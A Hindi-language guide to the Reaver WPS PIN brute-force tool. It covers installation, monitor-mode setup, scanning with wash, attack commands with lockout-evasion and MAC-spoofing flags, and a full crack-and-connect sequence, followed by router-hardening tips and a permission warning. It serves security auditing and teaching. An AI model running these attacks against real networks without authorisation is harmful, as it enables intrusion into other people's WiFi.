🔑 Reaver - WPS PIN Brute-Force Attack Tool

📶 WPS Attack 🔐 PIN Brute-Force ⚡ WiFi Cracking

Category: 5️⃣ Wireless Attacks

📝 Description

Reaver एक शक्तिशाली टूल है जो WPS (Wi-Fi Protected Setup) PIN ब्रूटफोर्स अटैक करता है। WPS एक ऐसी सुविधा है जो उपयोगकर्ताओं को PIN कोड के माध्यम से WiFi से कनेक्ट करने की सुविधा देती है। यह PIN 8 अंकों का होता है और इसमें सुरक्षा कमजोरियां हैं। Reaver WPS PIN को ब्रूटफोर्स करके WPA/WPA2 पासवर्ड प्राप्त कर सकता है। यह Aircrack-ng सुइट के साथ मिलकर काम करता है।

विशेषता: Reaver की सबसे बड़ी खासियत है कि यह WPS PIN को क्रैक करने के बाद सीधे WiFi पासवर्ड दे देता है। अगर राउटर पर WPS चालू है, तो यह हैंडशेक कैप्चर किए बिना भी पासवर्ड प्राप्त कर सकता है।

📦 Installation

Kali Linux (पहले से इंस्टॉल):

reaver -h

Ubuntu/Debian:

sudo apt update
sudo apt install reaver -y

GitHub से इंस्टॉल:

git clone https://github.com/t6x/reaver-wps-fork-t6x.git
cd reaver-wps-fork-t6x
./configure
make
sudo make install

💻 Common Commands (उदाहरण सहित)

📌 Reaver उपयोग करने से पहले वायरलेस कार्ड को मॉनिटर मोड में डालना जरूरी है:

🔹 1. मॉनिटर मोड में डालना:

sudo airmon-ng start wlan0

👉 उदाहरण: wlan0 को मॉनिटर मोड में डालता है (wlan0mon बन जाता है)।

🔹 2. आसपास के WPS-सक्षम नेटवर्क स्कैन करना:

sudo wash -i wlan0mon

👉 उदाहरण: सभी WPS-सक्षम WiFi नेटवर्क्स दिखाता है (BSSID, CHANNEL, WPS LOCKED, ESSID)।

🔹 3. बेसिक WPS PIN ब्रूटफोर्स अटैक:

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv

👉 उदाहरण: BSSID 00:11:22:33:44:55 वाले राउटर पर WPS PIN ब्रूटफोर्स करता है। -vv वर्बोस मोड।

🔹 4. चैनल स्पेसिफाई करके अटैक:

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -vv

👉 उदाहरण: चैनल 6 पर अटैक करता है (तेज और स्थिर)।

🔹 5. डिले सेट करना (WPS लॉकआउट से बचने के लिए):

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -d 5 -vv

👉 उदाहरण: हर अटैम्प्ट के बीच 5 सेकंड का डिले (WPS लॉकआउट से बचाता है)।

🔹 6. अटैक की स्पीड बढ़ाना (तेज अटैक):

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -t 2 -T 1 -vv

👉 उदाहरण: -t 2 (टाइमआउट 2 सेकंड), -T 1 (पैकेट डिले 1 सेकंड)।

🔹 7. पिछला अटैक जारी रखना (रेस्टोर):

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -S -vv

👉 उदाहरण: -S पिछली सेव की गई स्थिति से अटैक जारी रखता है।

🔹 8. MAC एड्रेस स्पूफिंग (अगर MAC ब्लॉक हो):

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 --mac=AA:BB:CC:DD:EE:FF -vv

👉 उदाहरण: कस्टम MAC एड्रेस के साथ अटैक करता है।

🔹 9. नेटवर्क इंटरफेस स्पेसिफाई करना:

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -I

👉 उदाहरण: -I (पैकेट इंजेक्शन फिक्स) नेटवर्क कार्ड को स्थिर करता है।

🔹 10. लॉग फाइल में सेव करना:

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -o reaver.log -vv

👉 उदाहरण: सारा आउटपुट reaver.log फाइल में सेव होगा।

🔹 11. सभी राउटर मॉडल्स के लिए बेसिक अटैक:

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -L -N -vv

👉 उदाहरण: -L (लॉकआउट से बचने के लिए), -N (NACK से बचने के लिए)।

🔹 12. नेटवर्क स्कैन और अटैक एक साथ:

sudo wash -i wlan0mon -C -f

👉 उदाहरण: -C (चैनल हॉप), -f (फास्ट स्कैन) के साथ WPS नेटवर्क स्कैन करता है।

🎯 WPS के बारे में महत्वपूर्ण जानकारी:

WPS PIN: 8 अंकों का होता है (जैसे 12345678)
सुरक्षा कमजोरी: PIN को 11000 प्रयासों में क्रैक किया जा सकता है
WPS Lockout: कई असफल प्रयासों के बाद राउटर WPS को बंद कर सकता है
WPS Disabled: कई राउटर्स में WPS डिफॉल्ट रूप से बंद होता है
WPS WPA3: WPA3 राउटर्स में WPS नहीं होता

🎯 Use Cases (उपयोग के तरीके)

WiFi सिक्योरिटी ऑडिट: अपने राउटर पर WPS चालू है या नहीं और कितना सिक्योर है यह जांचना।
WPS PIN क्रैकिंग: अगर राउटर पर WPS चालू है तो पासवर्ड प्राप्त करना।
पेनिट्रेशन टेस्टिंग: कमजोर WPS कॉन्फ़िगरेशन वाले राउटर ढूँढना।
लॉकआउट बायपास: विभिन्न तकनीकों से WPS लॉकआउट को बायपास करना।

⚙️ Key Features (मुख्य विशेषताएँ)

✔️ WPS PIN ब्रूटफोर्स अटैक
✔️ अटैक रेस्टोर फंक्शन (पिछली स्थिति से जारी रखना)
✔️ MAC एड्रेस स्पूफिंग
✔️ डिले और टाइमआउट सेटिंग्स (लॉकआउट से बचने के लिए)
✔️ वर्बोस मोड (डिटेल्ड आउटपुट)
✔️ लॉग फाइल में सेव करना
✔️ मल्टीपल राउटर मॉडल्स सपोर्ट
✔️ Aircrack-ng सुइट के साथ इंटीग्रेटेड

📌 Reaver अटैक की पूरी प्रक्रिया:

# 1. मॉनिटर मोड में डालें
sudo airmon-ng start wlan0

# 2. WPS-सक्षम नेटवर्क स्कैन करें
sudo wash -i wlan0mon

# 3. टारगेट पर अटैक शुरू करें
sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -d 2 -t 2 -T 1 -vv

# 4. पासवर्ड मिलने के बाद WiFi से कनेक्ट करें

📌 WPS लॉकआउट से बचने के तरीके:

-d 5: हर अटैम्प्ट के बीच 5 सेकंड डिले
-t 2: टाइमआउट 2 सेकंड
-T 1: पैकेट डिले 1 सेकंड
-L: लॉकआउट डिटेक्शन इनेबल
-N: NACK रिस्पॉन्स को इग्नोर करें
-w: WPS पिन स्टोर करें और बाद में जारी रखें

📌 Reaver vs Aircrack-ng:

Reaver: WPS PIN अटैक, हैंडशेक की जरूरत नहीं, राउटर पर WPS चालू होना चाहिए
Aircrack-ng: WPA/WPA2 हैंडशेक कैप्चर, डिक्शनरी अटैक, WPS की जरूरत नहीं
अनुशंसा: पहले Reaver से WPS चेक करें, अगर WPS बंद है तो Aircrack-ng से हैंडशेक कैप्चर करें।

🔗 Official Resources

GitHub Repository (Fork): https://github.com/t6x/reaver-wps-fork-t6x
Original Reaver: Google Code Archive
Kali Linux Tools: Kali Reaver Page

🔧 Related Tools (समान उपकरण)

Aircrack-ng: WiFi हैंडशेक कैप्चर और क्रैकिंग
Wifite: ऑटोमेटेड वायरलेस अटैक टूल (Reaver + Aircrack-ng)
Kismet: वायरलेस डिटेक्टर और स्निफर
PixieWPS: WPS PIN क्रैकिंग के लिए फास्ट टूल (पिक्सी डस्ट अटैक)
Bully: Reaver का विकल्प, WPS PIN क्रैकर

📌 WPS सुरक्षा सुझाव:

✅ राउटर सेटिंग्स में WPS को डिसेबल करें
✅ मजबूत WPA2 पासवर्ड का उपयोग करें (12+ अक्षर, मिक्स्ड)
✅ राउटर का फर्मवेयर अपडेट रखें
✅ नियमित रूप से अपने नेटवर्क की सुरक्षा जांचें

⚠️ Important Note (सावधानी)

Reaver का उपयोग केवल उन्हीं WiFi नेटवर्क पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के WPS PIN ब्रूटफोर्स करना कानूनी अपराध है। WPS अटैक से राउटर टेम्पोररी लॉक हो सकता है या फर्मवेयर क्रैश हो सकता है। हमेशा अपने खुद के राउटर या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें। कई नए राउटर्स में WPS डिफॉल्ट रूप से बंद होता है या WPA3 का उपयोग करते हैं।